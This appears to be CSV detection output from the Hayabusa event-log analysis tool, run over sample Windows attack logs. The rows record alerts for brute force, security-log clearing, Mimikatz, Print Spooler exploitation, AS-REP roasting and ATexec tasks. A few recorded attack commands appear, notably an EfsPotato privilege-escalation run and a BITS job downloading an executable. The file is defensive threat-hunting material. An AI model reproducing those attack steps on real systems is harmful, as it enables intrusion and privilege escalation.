2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$  :  Target User: sshd_4332  :  IP Address: -  :  Process: C:\Program Files\OpenSSH-Win64\sshd.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332  :  Workstation: -  :  IP Address: -  :  Port: -  :  LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$  :  Target User: admmig  :  IP Address: -  :  Process: C:\Program Files\OpenSSH-Win64\sshd.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,-
2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47156  :  LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47160  :  LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65333  :  LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65335  :  LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65336  :  LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65337  :  LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0  :  PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount  :  SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie  :  SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 56061  :  LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 51503  :  LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 56594  :  LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test  :  URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe  whoami  :  Path: C:\temp\EfsPotato.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\temp\EfsPotato.exe  whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
